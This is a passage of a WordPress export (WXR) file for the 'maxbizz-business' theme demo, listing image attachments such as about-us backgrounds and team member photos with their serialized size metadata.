		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:497;s:4:"file";s:30:"2020/12/features3-about-us.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:30:"features3-about-us-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:30:"features3-about-us-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:30:"features3-about-us-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:30:"features3-about-us-600x497.jpg";s:5:"width";i:600;s:6:"height";i:497;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/bg1-about-us/</link>
		<pubDate>Tue, 29 Dec 2020 08:08:49 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2044</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 08:08:49]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 08:08:49]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-about-us.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/bg1-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:570;s:4:"file";s:24:"2020/12/bg1-about-us.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:23:"bg1-about-us-300x89.jpg";s:5:"width";i:300;s:6:"height";i:89;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"bg1-about-us-1024x304.jpg";s:5:"width";i:1024;s:6:"height";i:304;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"bg1-about-us-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"bg1-about-us-768x228.jpg";s:5:"width";i:768;s:6:"height";i:228;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:25:"bg1-about-us-1536x456.jpg";s:5:"width";i:1536;s:6:"height";i:456;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"bg1-about-us-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"bg1-about-us-600x570.jpg";s:5:"width";i:600;s:6:"height";i:570;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:25:"bg1-about-us-1200x570.jpg";s:5:"width";i:1200;s:6:"height";i:570;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:25:"bg1-about-us-1200x570.jpg";s:5:"width";i:1200;s:6:"height";i:570;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image2-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/image2-about-us/</link>
		<pubDate>Tue, 29 Dec 2020 08:10:03 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image2-about-us.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2048</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 08:10:03]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 08:10:03]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image2-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image2-about-us.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/image2-about-us.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:516;s:6:"height";i:625;s:4:"file";s:27:"2020/12/image2-about-us.png";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:27:"image2-about-us-248x300.png";s:5:"width";i:248;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:27:"image2-about-us-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:27:"image2-about-us-516x400.png";s:5:"width";i:516;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:27:"image2-about-us-516x600.png";s:5:"width";i:516;s:6:"height";i:600;s:9:"mime-type";s:9:"image/png";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:27:"image2-about-us-516x600.png";s:5:"width";i:516;s:6:"height";i:600;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/team1/</link>
		<pubDate>Tue, 29 Dec 2020 08:15:44 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2056</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 08:15:44]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 08:15:44]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/team1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:17:"2020/12/team1.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:17:"team1-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:17:"team1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:17:"team1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:17:"team1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:17:"team1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/team2/</link>
		<pubDate>Tue, 29 Dec 2020 08:15:46 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2057</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 08:15:46]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 08:15:46]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/team2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:17:"2020/12/team2.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:17:"team2-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:17:"team2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:17:"team2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:17:"team2-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:17:"team2-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/team3/</link>
		<pubDate>Tue, 29 Dec 2020 08:15:47 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2058</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 08:15:47]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 08:15:47]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/team3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:17:"2020/12/team3.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:17:"team3-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:17:"team3-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:17:"team3-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:17:"team3-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:17:"team3-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/team4/</link>
		<pubDate>Tue, 29 Dec 2020 08:15:48 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team4.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2059</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 08:15:48]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 08:15:48]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team4.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/team4.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:17:"2020/12/team4.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:17:"team4-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:17:"team4-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:17:"team4-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:17:"team4-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:17:"team4-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team5</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/team5/</link>
		<pubDate>Tue, 29 Dec 2020 08:15:50 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team5.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2060</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 08:15:50]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 08:15:50]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team5]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team5.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/team5.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:17:"2020/12/team5.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:17:"team5-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:17:"team5-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:17:"team5-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:17:"team5-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:17:"team5-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team6</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/team6/</link>
		<pubDate>Tue, 29 Dec 2020 08:15:51 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team6.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2061</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 08:15:51]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 08:15:51]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team6]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team6.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/team6.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:17:"2020/12/team6.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:17:"team6-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:17:"team6-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:17:"team6-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:17:"team6-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:17:"team6-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team7</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/team7/</link>
		<pubDate>Tue, 29 Dec 2020 08:15:53 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team7.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2062</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 08:15:53]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 08:15:53]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team7]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team7.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/team7.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:17:"2020/12/team7.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:17:"team7-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:17:"team7-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:17:"team7-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:17:"team7-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:17:"team7-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team8</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/team8/</link>
